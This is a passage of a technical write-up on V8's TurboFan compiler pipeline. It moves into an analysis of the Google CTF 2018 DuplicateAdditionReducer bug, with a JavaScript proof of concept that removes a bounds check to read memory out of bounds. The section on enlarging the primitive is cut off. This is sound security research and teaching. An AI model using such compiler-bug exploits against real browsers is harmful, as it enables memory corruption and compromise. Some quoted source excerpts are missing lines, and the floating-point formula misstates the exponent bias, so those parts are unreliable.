- dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0

["d", "o", "a", "r", "e"]


If you want to know about existing runtime functions, simply go to src/runtime/ and grep on all the RUNTIME_FUNCTION (this is the macro used to declare a new runtime function).

Preparing Turbolizer

Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph.

cd tools/turbolizer
npm i
npm run-script build
python -m SimpleHTTPServer


When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit to a specific function), a .cfg and a .json files are generated so that you can get a graph view of different optimization passes using Turbolizer.

Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface.

Compilation pipeline

Let's take the following code.

let f = (o) => {
var obj = [1,2,3];
var x = Math.ceil(Math.random());
return obj[o+x];
}

for (let i = 0; i < 0x10000; ++i) {
f(i);
}


We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below.

$d8 pipeline.js --trace-opt [marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)] [marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)] [compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan] [optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms] [completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>] [compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR] [optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms]  We can look at the code object of the function before and after optimization using %DisassembleFunction. // before 0x17de4c02061: [Code] - map: 0x0868f07009d9 <Map> kind = BUILTIN name = InterpreterEntryTrampoline compiler = unknown address = 0x7ffd9c25d340  // after 0x17de4c82d81: [Code] - map: 0x0868f07009d9 <Map> kind = OPTIMIZED_FUNCTION stack_slots = 8 compiler = turbofan address = 0x7ffd9c25d340  What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code. Ignition instructions gather type feedback that will help for TurboFan's speculative optimizations. Speculative optimization means that the code generated will be made upon assumptions. For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by Turbofan will expect Player objects and will be very fast for this case. class Player{} class Wall{} function move(o) { // ... } player = new Player(); move(player) move(player) ... // ... optimize code! the move function handles very fast objects of type Player move(player)  However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, it needs to be destroyed and some ignition bytecode will be generated instead. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player, TurboFan will take this into account and optimize again the code accordingly. Let's observe this behaviour using --trace-opt and --trace-deopt ! class Player{} class Wall{} function move(obj) { var tmp = obj.x + 42; var x = Math.random(); x += 1; return tmp + x; } for (var i = 0; i < 0x10000; ++i) { move(new Player()); } move(new Wall()); for (var i = 0; i < 0x10000; ++i) { move(new Wall()); }  $ d8 deopt.js  --trace-opt --trace-deopt
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]
[deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98]
;;; deoptimize at <deopt.js:5:17>, wrong map
// [...]
[deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms]
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]


The log clearly shows that when encountering the Wall object with a different map (understand "type") it deoptimizes because the code was only meant to deal with Player objects.

If you are interested to learn more about this, I recommend having a look at the following ressources: TurboFan Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources.

Sea of Nodes

Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, load, stores, calls, constants etc. There are three types of edges that we describe one by one below.

Control edges

Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops.

Value edges

Value edges are the edges you find in Data Flow Graphs. They show value dependencies.

Effect edges

Effect edges order operations such as reading or writing states.

In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store as you can see below.

Experimenting with the optimization phases

In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include incorrect typing of Math.expm1, incorrect typing of String.(last)IndexOf (that I exploited here) or incorrect operation side-effect modeling.

In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder :

• src/builtin

Where all the builtins functions such as Array#concat are implemented

• src/runtime

Where all the runtime functions such as %DebugPrint are implemented

• src/interpreter/interpreter-generator.cc

Where all the bytecode handlers are implemented

• src/compiler

Main repository for TurboFan!

• src/compiler/pipeline.cc

The glue that builds the graph, runs every phase and optimizations passes etc

• src/compiler/opcodes.h

Macros that defines all the opcodes used by TurboFan

• src/compiler/typer.cc

Implements typing via the Typer reducer

• src/compiler/operation-typer.cc

Implements some more typing, used by the Typer reducer

• src/compiler/simplified-lowering.cc

Implements simplified lowering, where some CheckBounds elimination will be done

Let's consider the following function :

function opt_me() {
let x = Math.random();
let y = x + 2;
return y + 3;
}


Simply execute it a lot to trigger TurboFan or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer.

Graph builder phase

We can look at the very first generated graph by selecting the "bytecode graph builder" option. The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements.

Typer phase

After graph creation comes the optimization phases, which as the name implies run various optimization passes. An optimization pass can be called during several phases.

One of its early optimization phase, is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory.

// pipeline.cc
PipelineData* data = this->data_;
// Type the graph and keep the Typer running such that new nodes get
// automatically typed when they are created.
Run<TyperPhase>(data->CreateTyper());

// pipeline.cc
struct TyperPhase {
void Run(PipelineData* data, Zone* temp_zone, Typer* typer) {
// [...]
typer->Run(roots, &induction_vars);
}
};


When the Typer runs, it visits every node of the graph and tries to reduce them.

// typer.cc
void Typer::Run(const NodeVector& roots,
LoopVariableOptimizer* induction_vars) {
// [...]
Visitor visitor(this, induction_vars);
GraphReducer graph_reducer(zone(), graph());
for (Node* const root : roots) graph_reducer.ReduceNode(root);
graph_reducer.ReduceGraph();
// [...]
}

class Typer::Visitor : public Reducer {
// ...
Reduction Reduce(Node* node) override {
// calls visitors such as JSCallTyper
}

// typer.cc
Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) {
return Type::NonInternal();
}
JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction();
if (!function.shared().HasBuiltinFunctionId()) {
return Type::NonInternal();
}
switch (function.shared().builtin_function_id()) {
case BuiltinFunctionId::kMathRandom:
return Type::PlainNumber();


So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber.

Type Typer::Visitor::TypeNumberConstant(Node* node) {
double number = OpParameter<double>(node->op());
return Type::NewConstant(number, zone());
}
Type Type::NewConstant(double value, Zone* zone) {
if (RangeType::IsInteger(value)) {
return Range(value, value, zone);
} else if (IsMinusZero(value)) {
return Type::MinusZero();
} else if (std::isnan(value)) {
return Type::NaN();
}

DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value));
return OtherNumberConstant(value, zone);
}


For the NumberConstant nodes it's easy. We simply read TypeNumberConstant. In most case, the type will be Range. What about those SpeculativeNumberAdd now? We need to look at the OperationTyper.

#define SPECULATIVE_NUMBER_BINOP(Name)                         \
Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \
lhs = SpeculativeToNumber(lhs);                            \
rhs = SpeculativeToNumber(rhs);                            \
return Name(lhs, rhs);                                     \
}
#undef SPECULATIVE_NUMBER_BINOP

Type OperationTyper::SpeculativeToNumber(Type type) {
}


They end-up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after pre-processing).

To get the types of the right input node and the left input node, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well so that we end-up calling NumberAdd on two Number. NumberAdd mostly checks for some corner cases like if one of the two types is a MinusZero for instance. In most cases, the function will simply return the PlainNumber type.

Okay done for the Typer phase!

To sum up, everything happened in : - Typer::Visitor::JSCallTyper - OperationTyper::SpeculativeNumberAdd

And this is how types are treated : - The type of JSCall(MathRandom) becomes a PlainNumber, - The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n) - The type of a Range(n,n) is PlainNumber - The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber

Now the graph looks like this :

Type lowering

In OptimizeGraph, the type lowering comes right after the typing.

// pipeline.cc
Run<TyperPhase>(data->CreateTyper());
RunPrintAndVerify(TyperPhase::phase_name());
Run<TypedLoweringPhase>();
RunPrintAndVerify(TypedLoweringPhase::phase_name());


This phase goes through even more reducers.

// pipeline.cc
TypedOptimization typed_optimization(&graph_reducer, data->dependencies(),
data->jsgraph(), data->broker());
// [...]


Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce.

When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd.

Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) {
Node* const lhs = NodeProperties::GetValueInput(node, 0);
Node* const rhs = NodeProperties::GetValueInput(node, 1);
Type const lhs_type = NodeProperties::GetType(lhs);
Type const rhs_type = NodeProperties::GetType(rhs);
NumberOperationHint hint = NumberOperationHintOf(node->op());
if ((hint == NumberOperationHint::kNumber ||
hint == NumberOperationHint::kNumberOrOddball) &&
BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) &&
Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs);
Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs);
Node* const value =
ReplaceWithValue(node, value);
return Replace(node);
}
return NoChange();
}


In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber.

Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd.

Similarly, there is a JSTypedLowering::ReduceJSCall called when the JSTypedLowering reducer is visiting a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and change the opcode of the JSCall node to a Call opcode.

It also adds new inputs to this node.

Reduction JSTypedLowering::ReduceJSCall(Node* node) {
// [...]
// Check if {target} is a known JSFunction.
// [...]
// Load the context from the {target}.
Node* context = effect = graph()->NewNode(
effect, control);
NodeProperties::ReplaceContextInput(node, context);

// Update the effect dependency for the {node}.
NodeProperties::ReplaceEffectInput(node, effect);
// [...]
// kMathRandom is a CSA builtin, not a CPP one
// builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler)
} else if (shared.HasBuiltinId() &&
Builtins::HasCppImplementation(shared.builtin_id())) {
// Patch {node} to a direct CEntry call.
ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags);
} else if (shared.HasBuiltinId() &&
Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) {
// Patch {node} to a direct code object call.
Callable callable = Builtins::CallableFor(
isolate(), static_cast<Builtins::Name>(shared.builtin_id()));
CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState;

const CallInterfaceDescriptor& descriptor = callable.descriptor();
graph()->zone(), descriptor, 1 + arity, flags);
Node* stub_code = jsgraph()->HeapConstant(callable.code());
node->InsertInput(graph()->zone(), 0, stub_code);  // Code object.
node->InsertInput(graph()->zone(), 2, new_target);
node->InsertInput(graph()->zone(), 3, argument_count);
NodeProperties::ChangeOp(node, common()->Call(call_descriptor));
}
// [...]
return Changed(node);
}


Let's quickly check the sea of nodes to indeed observe the addition of the LoadField and the change of opcode of the node #25 (note that it is the same node as before, only the opcode changed).

Range types

Previously, we encountered various types including the Range type. However, it was always the case of Range(n,n) of size 1.

Now let's consider the following code :

function opt_me(b) {
let x = 10; // [1] x0 = 10
if (b == "foo")
x = 5; // [2] x1 = 5
// [3] x2 = phi(x0, x1)
let y = x + 2;
y = y + 1000;
y = y * 2;
return y;
}


So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once. So x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need of a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1.

So what about types now? The type of the constant 10 (x0) is Range(10,10) and the range of constant 5 (x1) is Range(5,5). Without surprise, the type of the phi node is the union of the two ranges which is Range(5,10).

Let's quickly draw a CFG graph in SSA form with typing.

Okay, let's actually check this by reading the code.

Type Typer::Visitor::TypePhi(Node* node) {
int arity = node->op()->ValueInputCount();
Type type = Operand(node, 0);
for (int i = 1; i < arity; ++i) {
type = Type::Union(type, Operand(node, i), zone());
}
return type;
}


The code looks exactly as we would expect it to be: simply the union of all of the input types!

To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRange(n.Min(), n.Max(), m.Min(), m.Max()).

Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) {
// If we have a Smi or Int32 feedback, the representation selection will
// either truncate or it will check the inputs (i.e., deopt if not int32).
// In either case the result will be in the safe integer range, so we
// can bake in the type here. This needs to be in sync with
return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone());
}

Type OperationTyper::NumberAdd(Type lhs, Type rhs) {
// [...]
Type type = Type::None();
lhs = Type::Intersect(lhs, Type::PlainNumber(), zone());
rhs = Type::Intersect(rhs, Type::PlainNumber(), zone());
if (!lhs.IsNone() && !rhs.IsNone()) {
if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) {
type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max());
}
// [...]
return type;
}


AddRanger is the function that actually computes the min and max bounds of the Range.

Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min,
double rhs_max) {
double results[4];
results[0] = lhs_min + rhs_min;
results[1] = lhs_min + rhs_max;
results[2] = lhs_max + rhs_min;
results[3] = lhs_max + rhs_max;
// Since none of the inputs can be -0, the result cannot be -0 either.
// However, it can be nan (the sum of two infinities of opposite sign).
// On the other hand, if none of the "results" above is nan, then the
// actual result cannot be nan either.
int nans = 0;
for (int i = 0; i < 4; ++i) {
if (std::isnan(results[i])) ++nans;
}
if (nans == 4) return Type::NaN();
Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone());
if (nans > 0) type = Type::Union(type, Type::NaN(), zone());
// Examples:
//   [-inf, -inf] + [+inf, +inf] = NaN
//   [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN
//   [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN
//   [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN
return type;
}


Done with the range analysis!

CheckBounds nodes

Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores.

Consider the following code :

function opt_me(b) {
let values = [42,1337];       // HeapConstant <FixedArray[2]>
let x = 10;                   // NumberConstant[10]          | Range(10,10)
if (b == "foo")
x = 5;                      // NumberConstant[5]           | Range(5,5)
// Phi                         | Range(5,10)
let y = x + 2;                // SpeculativeSafeIntegerAdd   | Range(7,12)
y = y + 1000;                 // SpeculativeSafeIntegerAdd   | Range(1007,1012)
y = y * 2;                    // SpeculativeNumberMultiply   | Range(2014,2024)
y = y & 10;                   // SpeculativeNumberBitwiseAnd | Range(0,10)
y = y / 3;                    // SpeculativeNumberDivide     | PlainNumber[r][s][t]
y = y & 1;                    // SpeculativeNumberBitwiseAnd | Range(0,1)
return values[y];             // CheckBounds                 | Range(0,1)
}


In order to prevent values[y] from using an out of bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase.

The cautious reader probably noticed something interesting about the range analysis. The type of the CheckBounds node is Range(0,1)! And also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering.

Simplified lowering

When visiting a node with a IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called.

And this function, is responsible for CheckBounds elimination which sounds interesting!

Long story short, it compares inputs 0 (index) and 1 (length). If the index's minimum range value is greater than zero (or equal to) and its maximum range value is less than the length value, it triggers a DeferReplacement which means that the CheckBounds node eventually will be removed!

 void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
CheckParameters const& p = CheckParametersOf(node->op());
Type const index_type = TypeOf(node->InputAt(0));
Type const length_type = TypeOf(node->InputAt(1));
if (length_type.Is(Type::Unsigned31())) {
if (index_type.Is(Type::Integral32OrMinusZero())) {
// Map -0 to 0, and the values in the [-2^31,-1] range to the
// [2^31,2^32-1] range, which will be considered out-of-bounds
// as well, because the {length_type} is limited to Unsigned31.
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
if (lower()) {
if (lowering->poisoning_level_ ==
PoisoningMitigationLevel::kDontPoison &&
(index_type.IsNone() || length_type.IsNone() ||
(index_type.Min() >= 0.0 &&
index_type.Max() < length_type.Min()))) {
// The bounds check is redundant if we already know that
// the index is within the bounds of [0.0, length[.
DeferReplacement(node, node->InputAt(0));
} else {
NodeProperties::ChangeOp(
node, simplified()->CheckedUint32Bounds(p.feedback()));
}
}
// [...]
}


Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs.

We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is going to be replaced as proven useless by the optimization passes analysis.

After simplified lowering, the graph looks like this :

If you look at the file stopcode.h we can see various types of opcodes that correspond to some kind of add primitive.

V(JSAdd)
// many more [...]


So, without going into too much details we're going to do one more experiment. Let's make small snippets of code that generate each one of these opcodes. For each one, we want to confirm we've got the expected opcode in the sea of node.

let opt_me = (x) => {
return x + 1;
}

for (var i = 0; i < 0x10000; ++i)
opt_me(i);
%DebugPrint(opt_me);
%SystemBreak();


In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier.

Indeed, before kicking out TurboFan, v8 first quickly generates ignition bytecode that gathers type feedback.

$d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me [generated bytecode for function: opt_me] Parameter count 2 Frame size 0 13 E> 0xceb2389dc72 @ 0 : a5 StackCheck 24 S> 0xceb2389dc73 @ 1 : 25 02 Ldar a0 33 E> 0xceb2389dc75 @ 3 : 40 01 00 AddSmi [1], [0] 37 S> 0xceb2389dc78 @ 6 : a9 Return Constant pool (size = 0) Handler Table (size = 0)  The x + 1 statement is represented by the AddSmi ignition opcode. If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode. Let's read the code to quickly understand the semantics. // Adds an immediate value <imm> to the value in the accumulator. IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) { BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback); }  This code means that everytime this ignition opcode is executed, it will gather type feedback to to enable TurboFan’s speculative optimizations. We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector. DebugPrint: 0x129ab460af59: [Function] // [...] - feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace // [...] gef➤ job 0x1a5d13f1dd91 0x1a5d13f1dd91: [FeedbackVector] in OldSpace // ... - slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback [0]: 1 }  Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd. This is exactly the reason why it is called speculative optimization (TurboFan makes guesses, assumptions, based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there would be a deoptimization. SpeculativeNumberAdd let opt_me = (x) => { return x + 1000000000000; } opt_me(42); %OptimizeFunctionOnNextCall(opt_me); opt_me(4242);  If we modify a bit the previous code snippet and use a higher value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan speculates about the type of x and relies on type feedback. Int32Add let opt_me= (x) => { let y = x ? 10 : 20; return y + 100; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false);  At first, the addition y + 100 relies on speculation. Thus, the opcode SpeculativeSafeIntegerAdd is being used. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two small 32 bits integers, thus lowering the node to a Int32Add. • Before • After JSAdd let opt_me = (x) => { let y = x ? ({valueOf() { return 10; }}) : ({[Symbol.toPrimitive]() { return 20; }}); return y + 1; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false);  In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation. NumberAdd let opt_me = (x) => { let y = x ? 10 : 20; return y + 1000000000000; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false);  Like for the SpeculativeNumberAdd example, we add a value that can't be represented by an integer. However, this time there is no speculation involved. There is no need for any kind of type feedback since we can guarantee that y is an integer. There is no way to make y anything other than an integer. The DuplicateAdditionReducer challenge The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1. Understanding the reduction Let’s read the relevant part of the code. Reduction DuplicateAdditionReducer::Reduce(Node* node) { switch (node->opcode()) { case IrOpcode::kNumberAdd: return ReduceAddition(node); default: return NoChange(); } } Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) { DCHECK_EQ(node->op()->ControlInputCount(), 0); DCHECK_EQ(node->op()->EffectInputCount(), 0); DCHECK_EQ(node->op()->ValueInputCount(), 2); Node* left = NodeProperties::GetValueInput(node, 0); if (left->opcode() != node->opcode()) { return NoChange(); // [1] } Node* right = NodeProperties::GetValueInput(node, 1); if (right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [2] } Node* parent_left = NodeProperties::GetValueInput(left, 0); Node* parent_right = NodeProperties::GetValueInput(left, 1); if (parent_right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [3] } double const1 = OpParameter<double>(right->op()); double const2 = OpParameter<double>(parent_right->op()); Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2)); NodeProperties::ReplaceValueInput(node, parent_left, 0); NodeProperties::ReplaceValueInput(node, new_const, 1); return Changed(node); // [4] }  Basically that means we've got 4 different code paths (read the code comments) when reducing a NumberAdd node. Only one of them leads to a node change. Let's draw a schema representing all of those cases. Nodes in red to indicate they don't satisfy a condition, leading to a return NoChange. The case [4] will take both NumberConstant's double value and add them together. It will create a new NumberConstant node with a value that is the result of this addition. The node's right input will become the newly created NumberConstant while the left input will be replaced by the left parent's left input. Understanding the bug Precision loss with IEEE-754 doubles V8 represents numbers using IEEE-754 doubles. That means it can encode integers using 52 bits. Therefore the maximum value is pow(2,53)-1 which is 9007199254740991. Number above this value can't all be represented. As such, there will be precision loss when computing with values greater than that. A quick experiment in JavaScript can demonstrate this problem where we can get to strange behaviors. d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> x 9007199254740992 d8> x + 1 9007199254740992 d8> 9007199254740993 == 9007199254740992 true d8> x + 2 9007199254740994 d8> x + 3 9007199254740996 d8> x + 4 9007199254740996 d8> x + 5 9007199254740996 d8> x + 6 9007199254740998  Let's try to better understand this. 64 bits IEEE 754 doubles are represented using a 1-bit sign, 11-bit exponent and a 52-bit mantissa. When using the normalized form (exponent is non null), to compute the value, simply follow the following formula. value = (-1)^sign * 2^(e) * fraction e = 2^(exponent - bias) bias = 1024 (for 64 bits doubles) fraction = bit52*2^-0 + bit51*2^-1 + .... bit0*2^52  So let's go through a few computation ourselves. d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0ddd0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0ddd8 0x433fffffffffffff d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0aec0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0aec8 0x4340000000000000 d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0de88 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0de90 0x4340000000000001  For each number, we'll have the following computation. You can try the computations using links 1, 2 and 3. As you see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles. That's why it is not possible to increment 9007199254740992. You can however add 2 to 9007199254740992 because the result can be represented! That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit. d8> var x = Number.MAX_SAFE_INTEGER + 1 9007199254740992 d8> x + 1 + 1 9007199254740992 d8> x + 2 9007199254740994  Therefore, those two graphs are not equivalent. Furthermore, the reducer does not update the type of the changed node. That's why it is going to be 'incorrectly' typed with the old Range(9007199254740992,9007199254740992), from the previous Typer phase, instead of Range(9007199254740994,9007199254740994) (even though the problem is that really, we cannot take for granted that there is no precision loss while computing m+n and therefore x += n; x += n; may not be equivalent to x += (n + n)). There is going to be a mismatch between the addition result 9007199254740994 and the range type with maximum value of 9007199254740992. What if we can use this buggy range analysis to get to reduce a CheckBounds node during the simplified lowering phase in a way that it would remove it? It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range to the length so that it believes that the index is in bounds when in reality it is not. Thus removing what seemed to be a useless bound check. Let's check this by having yet another look at the sea of nodes! First consider the following code. let opt_me = (x) => { let arr = new Array(1.1,1.2,1.3,1.4); arr2 = new Array(42.1,42.0,42.0); let y = (x == "foo") ? 4503599627370495 : 4503599627370493; let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992 // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction z = z - (4503599627370495*2); // max = 2 vs actual max = 4 return arr[z]; } opt_me(""); %OptimizeFunctionOnNextCall(opt_me); let res = opt_me("foo"); print(res);  We do get a graph that looks exactly like the problematic drawing we showed before. Instead of getting two NumberAdd(x,1), we get only one with NumberAdd(x,2), which is not equivalent. The maximum value of z will be the following : d8> var x = 9007199254740992 d8> x = x + 2 // because of the buggy reducer! 9007199254740994 d8> x = x - (4503599627370495*2) 4  However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows : d8> var x = 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x - (4503599627370495*2) 2  Confirm that by looking at the graph. The index type used by CheckBounds is Range(0,2)(but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index looks to be always in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further (length is 4, we read at index 4. You could also have an array of length 3 and read at index 3 or 4.). Actually, if we execute the script, we get some OOB access and leak memory! $ d8 trigger.js --allow-natives-syntax
3.0046854007112e-310


Exploitation

Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory.

Improving the primitive

One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough.

For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out of bounds by 4 and not 2 anymore.

d8> sum = 007199254740989 + 9007199254740966
x + 9014398509481956
d8> a = x + sum
18021597764222948
d8> b = x + 007199254740989 + 9007199254740966
18021597764222944
d8> a - b
4


And what if we do multiple additions to get even more precision loss? Like x + n + n + n + n to be transformed as x + 4n?

d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
undefined
